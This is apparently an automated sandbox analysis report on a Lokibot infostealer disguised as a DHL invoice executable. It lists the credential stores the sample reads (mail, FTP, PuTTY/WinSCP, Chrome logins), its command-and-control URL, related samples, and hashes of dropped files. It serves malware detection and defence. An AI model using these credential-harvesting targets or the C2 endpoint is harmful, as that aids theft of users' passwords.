
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

0_2_004036FC

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL_#U53d1#U7968.exe PID: 8008, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL_#U53d1#U7968.exe PID: 8008, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	2 OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	111 Virtualization/Sandbox Evasion	1 Credentials in Registry	111 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	6 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	15 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL_#U53d1#U7968.exe	24%	ReversingLabs	Win32.Trojan.InjectorX

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe	24%	ReversingLabs	Win32.Trojan.InjectorX

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://216.128.145.196/~wellseconds/?p=43026970	100%	Avira URL Cloud	phishing
http://216.128.145.196/~wellseconds/?p=43026970V	100%	Avira URL Cloud	phishing
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://216-128-145-196.cprapid.com/~wellseconds/wp-json/	100%	Avira URL Cloud	phishing
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
http://216-128-145-196.cprapid.com/~wellseconds/wp-json/	4%	Virustotal		Browse
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.181.238	true	false	high
googlehosted.l.googleusercontent.com	142.250.186.129	true	false	high
doc-0s-3o-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://216.128.145.196/~wellseconds/?p=43026970	true	Avira URL Cloud: phishing	unknown
https://doc-0s-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ca95q9srt742e8g9mee28t9fvcpi0rnq/1691687550000/04164905018868905653/*/1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE?e=download&uuid=fd09c5b4-1c26-472b-8acd-937df6ec0e47	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://216.128.145.196/~wellseconds/?p=43026970V	DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://doc-0s-3o-docs.googleusercontent.com/	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002989000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0s-3o-docs.googleusercontent.com/%%doc-0s-3o-docs.googleusercontent.com	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002948000.00000004.00000020.00020000.00000000.sdmp	false		high
http://216-128-145-196.cprapid.com/~wellseconds/wp-json/	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002989000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://drive.google.com/	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002976000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.w.org/	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002989000.00000004.00000020.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0s-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ca95q9sr	DHL_#U53d1#U7968.exe, 00000002.00000003.11469874763.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002948000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error...	DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000626000.00000020.00000001.01000000.00000005.sdmp	false		high
https://ocsp.quovadisoffshore.com0	DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gopher.ftp://ftp.	DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.181.238	drive.google.com	United States	15169	GOOGLEUS	false
142.250.186.129	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
216.128.145.196	unknown	United States	20473	AS-CHOOPAUS	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1289543
Start date and time:	2023-08-10 19:10:42 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	DHL_#U53d1#U7968.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/9@2/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 84.4% (good quality ratio 83.5%) Quality average: 85.8% Quality standard deviation: 22.8%
HCA Information:	Successful, ratio: 82% Number of executed functions: 39 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target DHL_#U53d1#U7968.exe, PID 8008 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
216.128.145.196	DOC_AWB_1100771254.exe	Get hash	malicious	GuLoader, Lokibot	Browse	216.128.145.196/~wellseconds/?p=7982
	#U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	216.128.145.196/~wellseconds/?p=060773029
	s7Rb27E2T8.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=7982
	DHL_Invoice_72143002501.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=66663842554017
	E-Invoice#001818843.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=66663842554017
	checkzx.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=7982
	DHL_Invoice_UTJUk1GTKE.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=236353075
	UPS_Shipment_Invoice.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=236353075
	CreditCard.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=65575353786827
	J0370600140.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=5809290034477
	AWB#2334578903123.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=5809290034477
	U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	216.128.145.196/~wellseconds/?p=529497154189253
	DHL_Express_1301284170.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=236353075
	DHL_Invoice_UTJU01GTKE.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=236353075
	UPS_Shipment_Documents_UPSCBJ19051780131.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=236353075
	gunzipped.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=65575353786827
	AWB_1ZY0W5038626871089.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=5809290034477
	AWB#_772803166933.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=817152758105
	E-Invoice#000002380.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196/~wellseconds/?p=236353075

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	dCbp7tSxY6.exe	Get hash	malicious	RedLine, Xmrig	Browse	136.244.98.226
	DOC_AWB_1100771254.exe	Get hash	malicious	GuLoader, Lokibot	Browse	216.128.145.196
	#U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	216.128.145.196
	s7Rb27E2T8.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196
	DHL_Invoice_72143002501.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196
	file.exe	Get hash	malicious	Djvu, Fabookie, Glupteba, RedLine, SmokeLoader	Browse	108.61.99.145
	file.exe	Get hash	malicious	RedLine	Browse	209.250.248.11
	YjNID7X0kj.exe	Get hash	malicious	Djvu, Fabookie, Glupteba, RedLine, SmokeLoader	Browse	108.61.99.145
	lO188m2RAu.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	199.247.0.216
	E-Invoice#001818843.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196
	LVLjO31m32.exe	Get hash	malicious	RedLine	Browse	209.250.248.11
	9tnn2iO8SH.exe	Get hash	malicious	RedLine	Browse	209.250.248.11
	qtxomLbAT0.exe	Get hash	malicious	RedLine	Browse	209.250.248.11
	AbOIvblSAI.elf	Get hash	malicious	Mirai	Browse	44.174.145.30
	oZbQ5OGw01.elf	Get hash	malicious	Mirai	Browse	44.174.4.18
	file.exe	Get hash	malicious	Djvu, Fabookie, Glupteba, RedLine, SmokeLoader	Browse	108.61.99.145
	file.exe	Get hash	malicious	RedLine	Browse	209.250.248.11
	checkzx.exe	Get hash	malicious	Lokibot	Browse	216.128.145.196
	9596390fa3510502294f557f423d576f09e965d5e8eb2.exe	Get hash	malicious	RedLine	Browse	209.250.248.11
	fbZaDFMAv3.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader	Browse	108.61.99.145

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	LOGISTEC.xlsx	Get hash	malicious	SharepointPhisher	Browse	142.250.181.238 142.250.186.129
	DOC_AWB_1100771254.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.181.238 142.250.186.129
	Scan_20230810_0326419.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.186.129
	r3ONXhcFey.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.186.129
	Setup.exe	Get hash	malicious	Vidar	Browse	142.250.181.238 142.250.186.129
	OluraASgWf.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.186.129
	fjerbregners_patrol.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.186.129
	WSetup-Password-123.rar	Get hash	malicious	Vidar	Browse	142.250.181.238 142.250.186.129
	#U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.181.238 142.250.186.129
	(#Uc11c#Uc6b8#Ub300#Ud559#Uad50)_230809QUOT_-_0329KR.exe	Get hash	malicious	GuLoader, Remcos	Browse	142.250.181.238 142.250.186.129
	XUCN5hI9xKdNFXa.exe	Get hash	malicious	DarkCloud	Browse	142.250.181.238 142.250.186.129
	2g3yIqHc6Z.exe	Get hash	malicious	Vidar	Browse	142.250.181.238 142.250.186.129
	rPRESSUREREDUCINGVALVE_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.186.129
	tgmap.exe	Get hash	malicious	Unknown	Browse	142.250.181.238 142.250.186.129
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.186.129
	n7lAnu6bK6.exe	Get hash	malicious	Amadey, RedLine, Redeem	Browse	142.250.181.238 142.250.186.129
	revenue-en-local_lnk.lnk	Get hash	malicious	Unknown	Browse	142.250.181.238 142.250.186.129
	1iqpDUPZm5.exe	Get hash	malicious	DarkCloud	Browse	142.250.181.238 142.250.186.129
	kU8gXjwA8Z.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.186.129
	Update.js	Get hash	malicious	Unknown	Browse	142.250.181.238 142.250.186.129

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang\slbene.exe

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	data
Category:	dropped
Size (bytes):	9972
Entropy (8bit):	7.97977941086316
Encrypted:	false
SSDEEP:	192:qNwikWb6/2eAinXoyDzM1g5m/1h3et+18YYJL2ceHPvA:riVeUiYaMq+RYJLxwA
MD5:	D8EE46409AA776A47DC1F4EA074D0EAB
SHA1:	7EC8CEB1BFDF6B4A127C0F06A285F87E5EC20449
SHA-256:	12EFB95020D6E2AEFFD9B5CAC97789DF7ED1CA04FE67DA64F7538DB536F2669C
SHA-512:	2BF6A089F6EB4E1D72D66BED094B4AF588D83DEEA7E1DEF8813367C03FD1EE0E5E6A84EB6718A30B29E547F1533B9297465B9A767696980A2D647A3E03A49578
Malicious:	false
Reputation:	low
Preview:	.{.rC...{..t.T.g..<.o6...;....9F.h.U.+....blr...u.....k+.W...0K.^.5..9......{..nf.......a.+\|..T^.._....dO.....\...Z..K{...O=.ZG.-g.;.......uIh...,.7.;..?!....^.T..mtf.3.!4R...o.>....JZ.u<f..~.Q....5..L......WN..m.#..?.ePv...<m...v:..b.....i.y@.......PB....=.}.....v..L...8P..X_.@......:....sI...T)n.\nk.....S..I....ZQ.....`.'....}.b.5f;.fP-W#L...},z..\....w8.....H.F]...gr!0.~..(........Pco.q.X......I.....w3.+.I.{.n..#.......9.n.{.#......Kz....Npb.....x.>....b.4.....l1.........6...sj.A....J....$.v.....f~..,.....)e..-...........{.3.;<{B..[...!..P.IM......d.@P{.U.'.wCv....\.e.#...p.ep(-.....}.Y.......b.m....e-..`4GZB.t....S..(k..}G..c.).Y.c.m..v..........Iq.}.w.0..,..e.....E..Z...J.WQ.g...\..iMU..F..JN48.g#C..1.........N.%[.Y'..I8]....K.t.>.v..H.DO....W,"...S.)..fA.....r.5.p..y\|.D........../.s0k.]`...zwr.@.+....i\|5~.P........4a...t\|...)....EK..K.n....[.7J....b,..L.d.QVt...D.....),F..^'J.B...L.iI.a...$K.t...nT{._/....RI,_...7:...\.n..

C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang\tvesprogede.fed

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	data
Category:	dropped
Size (bytes):	6090
Entropy (8bit):	7.969438107575008
Encrypted:	false
SSDEEP:	96:7ddGw5JiJ5IOvwK4kVRO7+tELRSsD/tdatk/VrP6gz8svlXiDghLRC4Euj:7ddGUEJp/ObR5D/2tkEg7XKghMmj
MD5:	A3812720FC0937D2EBA51D972270E2C3
SHA1:	B45D2053EBE8BA417E16FB99D72D1C620B32B4F7
SHA-256:	A3F78610F2924B5DDD24A12CF2C59DCBEC131B10A905D99ECCD3B897292715EF
SHA-512:	F900DFE3326EE94D01035859F8F807CB5BD22604F2359F3D7BB33FA5B8339EF008F3C4E9408E88D3F951B83E59C1E28F590CC09F56A175C00CA306E358740926
Malicious:	false
Reputation:	low
Preview:	.,1..~n...."r...(...q../.w...m.+ =YT...!...#..zXbM...jH...)W...z...,J`7V).<..g8. &.#..)&G8..8...1B....<...7..H[<.+8..l'V........G.....5.[.0..O......z..G.....0^....!..-..z?&D.C&.x...%y..0F..........z..O....[.AR..AG..Rx%5."..A..[o..S...$.d..9{'..2..cm8.H.W.7.....u$b6v.,...Ue6.:0F._^{. ...:.,..K.x..+.h.=.#.WJ..dw......a..qN...../.W...nU..:n..e.....<.....J.2r1.O..T......J.C.D.=.T/.N..Y.4......-6...d..w....p"1...+...D...2..s./....B.c>......q.......\.C.4h6G..z......Z....`....}....G1Q.$..,.....4..P.K.l._q.j....0..-....b.:.eH_...../.P...o6\.h)...[..cQ.....l....A.-W.zz...Rj..q..m....P..+.j..j.....D.N=.z...A.................7-..X...X.;).i......EI.;l...h+#...."3W.h..).."GgG..h..z.9.ZX...%...2n.@.g......w..G..~g....<....+0.g.;..FD6=.C....l.=.bW....q..iLZ..d..u..kPG..@QO.v.........^._g.......=.t.....{jB.....Y.&?.V...E..`.x..ug.\|..@.wbz...U.Na.,9{Q.'[2A.;z.zQ..p....Z.N...g.Y.....`W.B.(.(...."..e..DF.Z.tB.E...od~...'..G).....*P....7..%..v..'

C:\Users\user\AppData\Local\Temp\mnstring\Lithoed\Valutaenhederne\Lecanomancy\glucosic.dal

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	data
Category:	dropped
Size (bytes):	4347
Entropy (8bit):	7.958125070410311
Encrypted:	false
SSDEEP:	96:pRxzSspJCkWj+jua+BXLnBxsC6no5sc+ih852:hSYajra+RLBxsZno5sct8I
MD5:	3ED32E9228C60D2E5BCFC01D5B4192DA
SHA1:	E815A4710B028FD80F66ED890DD6287B04A96DE0
SHA-256:	801E379112870B55147DB5E678F1EB70DC88C983E4A6F52853F12240ED9501D2
SHA-512:	188EFCD34B5FFBC1C361E5A22AE283E73D7F27D54F4DC651E0BD06BB0DD42885B0EE0AE24FE098B6BA41AE6CD3D6FF9E08B9121BF30963BD4AFD09E053C77BE7
Malicious:	false
Reputation:	low
Preview:	.8..D.`0..q.;..(.$cIC....9%..Q.^.$...xuQ..w.....I..6C..'.e......I.z.-...Pv%I.4f..6$W8.....L!.&._.:..x...Fx.nmXeP.....@...}.......?\T..5...y7.T{H.K..l.k...r..$...(..k>..KMG..0.k. ......UP..3..X{....w..h.-...l.........u..'...k9...+/..I... o....n=.....g..p.f.S...B..s.g......wXg......P.\|.L..!..\....X.)....H....JY.....r.8......E....M.J.j..q.....6:......-.O..i.hp0.3.;G.w.h....\|t..o....(.R...7pzd..U..5.8...W.N....w.M.hF..!.....h.............H>.~......-]....Y.si.>...B)..L..n.Qq.Y..F....b..hH.S...-@_f..a......1...j..LT..w?F.\|..$s.!. .x/..\..;3...R.B.yy]..\G#........'.......RY.m...o...m..8.-..G\...j..fx+.pC.;.<RP...m.M..2..y...U..y..#z.YX.v.w.GsT...Y...gn../.a.<3...@.\|.G.j.C4..5.8W ......M8.iH.%...[._.;Y.y-.\|..]S....&aL....../...T#.S<....i}..2e92..8J..ug..*_...(.s.r...tW!...@..X.[...)V.G...0.>......'.R:.}b...\.90.xw]R).+..E.u..v....cl.d..W......<$R...n.....5.,...q.\H.SK...s..H^.J.W..e..X...m.Rf..nJ........@..a.L\|A.....Y..(Oo._.~'...z..#...0..`AK.

C:\Users\user\AppData\Local\Temp\mnstring\Vrdistemplingerne\Braveries65.Lse

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	TeX font metric data
Category:	dropped
Size (bytes):	469792
Entropy (8bit):	7.020058801008105
Encrypted:	false
SSDEEP:	6144:VXI9kRgcyegEL/+Iwv6rBpjozHtta0Zk5mS2OLTVQaEATCd3H9Bf8N49G4j4/j:VXIaR13XJoLtta0Zk55/OaFTUzfEY47
MD5:	082BF5767F1B5BCD5E5EE0D3AC696200
SHA1:	9995A1A02DFC76FF9577EACD43E7AE54DAC64832
SHA-256:	2524E4EEEED147E2238268679B200471533F964E287CF378C1D9486257548C0B
SHA-512:	57E0C85618AAA1E1DD580E80F39C05066320A8D40A907BA140B154A413639A0036B1771ABAA471E25874CCC6FC47CDF7854AA48BFDD6F8E14829248F1924AFF0
Malicious:	false
Preview:	.....\\.................66..........................\|\|.................................i..................eee.w.......?.......@.....[.P..K.q.uu.........++..............AAAAA...................O........Q.........MM.............D.xxx.......\|\|\|................R........W.........................................]]..iii..hh.............]]]]]...~.aaaaa........................8......T..........!!!.......[.K................2....................ww..A...................................kk.................44.E.....................[[........[.....SSSS.............:...................**.....""..i........................ii.........................................IIIIIII..........N......................s......PP...........$...bb.^........77777.........]]................y.=....".................uuu...jjjj..........\|\|..........................*...^...............f.........................s.....8.......................................................II....#.<...........eeee.$$.aaaaaa......G.........

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.974444797015433
Encrypted:	false
